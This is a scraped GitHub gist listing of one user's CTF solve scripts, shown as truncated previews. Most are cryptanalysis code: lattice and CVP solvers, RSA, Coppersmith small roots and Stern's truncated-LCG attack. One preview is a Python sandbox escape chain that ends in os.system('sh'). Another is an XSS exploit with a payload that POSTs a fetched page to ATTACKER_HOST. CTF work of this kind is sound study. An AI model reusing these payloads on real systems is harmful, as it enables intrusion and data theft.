maple maple3142
- javascript:alert(origin)
- @maple3142
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from lll_cvp import * | |
| from functools import partial | |
| def example1(): | |
| # copied from https://github.com/rkm0959/Inequality_Solving_with_CVP/blob/main/Example%20Challenge%204%20-%20HITCON%20CTF%202019%20Quals%20-%20not%20so%20hard%20RSA/solve_challenge_4.sage | |
| ## Example 4 : HITCON CTF 2019 Quals not so hard RSA | |
| ## d is 465 bits |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from Crypto.Util.number import bytes_to_long, getStrongPrime, isPrime | |
| SIZE = 512 | |
| e = 65537 | |
| with open("flag.txt", "rb") as f: | |
| m = bytes_to_long(f.read()) | |
| def encrypt(m): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from tqdm import tqdm, trange | |
| from Crypto.Util.number import getPrime | |
| ps = [getPrime(128) for _ in trange(600, desc="Generate primes")] | |
| P = prod(ps) | |
| T = [(P // p) * inverse_mod(P // p, p) for p in tqdm(ps, desc="Fast CRT coefficients")] | |
| Tslow = [ | |
| crt([0] * i + [1] + [0] * (len(ps) - i - 1), ps) | |
| for i in trange(len(ps), desc="Slow CRT coefficients") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (s:=(c:=().__class__.__subclasses__().pop(-2)).__class__.__setattr__)(c,'s',s) | |
| (c:=().__class__.__subclasses__().pop(-2)).s(c,'x',c.__repr__) | |
| (c:=().__class__.__subclasses__().pop(-2)).s(c,'x',c.x.__globals__) | |
| (c:=().__class__.__subclasses__().pop(-2)).s(c,'x',c.x.__getitem__) | |
| (c:=().__class__.__subclasses__().pop(-2)).s(c,'x',c.x('sys')) | |
| (c:=().__class__.__subclasses__().pop(-2)).s(c,'x',c.x.modules) | |
| (c:=().__class__.__subclasses__().pop(-2)).s(c,'x',c.x.__getitem__) | |
| (c:=().__class__.__subclasses__().pop(-2)).s(c,'x',c.x('os')) | |
| (c:=().__class__.__subclasses__().pop(-2)).s(c,'x',c.x.system) | |
| (c:=().__class__.__subclasses__().pop(-2)).x('sh') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from sage.all import * | |
| from math import gcd | |
| from Crypto.Util.number import long_to_bytes | |
| import itertools | |
| def small_roots( | |
| N, | |
| f, | |
| bounds, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from sage.all import * | |
| from cpmpy import cpm_array, intvar, Model | |
| import re | |
| import numpy as np | |
| from Crypto.Util.number import long_to_bytes | |
| # fmt: off | |
| p = 10455755303881470564335823693050071216876084302779301958643231627211528198918740466518331511682617514785374774155465658746281899684760991037492493121631097 | |
| public_shares = [(1337, 1650601573256660700025983099389847404287371792209826894172936673219307987142234073724123985596898136416342832363378752808202043270892758156893643184622917), (48879, 10245506766311536223801309300676898037551029835023534273381238156333461073421971506846811165174309008333508986480294061107462457987212304049599769044657817), (51966, 5859579028489572966139706776167654126678329485615172349824462797003633207598276834487698035757221076083482324371529983809497416849313794719873532398479866), (57005, 1355655372739803925098451066341295601214092302693649405514610829322484191059267898706715750419939661833680243515749318565040749416377065991979895621719206)] | |
| # fmt: on |
maple3142
/ stern_attack.sage
Created
June 29, 2023 08:15
stern's attack for recovering parameter from truncated lcg (On Stern’s Attack Against Secret Truncated Linear Congruential Generators)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| k, s = 128, 32 | |
| p = random_prime(1 << k) | |
| a = randint(1, p) | |
| b = randint(1, p) | |
| seed = randint(1, p) | |
| state = seed | |
| ys = [] | |
| xs = [] | |
| zs = [] | |
| for _ in range(64): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # express sqrt(2) in terms of a rational polynomial of w=sqrt(2)+sqrt(3)+sqrt(5) | |
| w = sqrt(2) + sqrt(3) + sqrt(5) | |
| K = QQ[w] | |
| f = K(2).sqrt().lift() | |
| print(f) | |
| print(f(w).expand()) | |
| PR = PolynomialRing(QQ, "x,y,z,r", order="lex") | |
| x, y, z, r = PR.gens() | |
| I = PR.ideal([x ^ 2 - 2, y ^ 2 - 3, z ^ 2 - 5, r - x - y - z]) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| const samesiteXSS = | |
| 'http://xssl.web.jctf.pro/?text=a&unmodifiable[CSP]=a&unmodifiable[background]=`;location.assign(name);`' | |
| // prepare an account with the following xss payload as description | |
| // <svg><textarea></svg><script>fetch('/profile%2fedit').then(r=>r.text()).then(t=>fetch('https://ATTACKER_HOST/report',{method:'POST',body:t,mode:'no-cors'}))< /script> | |
| // the `%2f` in `/profile%2fedit` is needed or browser will use our provided XSS account session to request it, which doesn't have the flag | |
| // playing with window/iframe references should work too | |
| window.name = | |
| 'javascript:' + |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| from bs4 import BeautifulSoup | |
| import hashlib | |
| from itertools import chain | |
| import os, re, time | |
| rand = os.urandom(4).hex() | |
| # remote have some really funky caching and multiple instances... | |
| host = "https://tweedle-dee.france-cybersecurity-challenge.fr/" |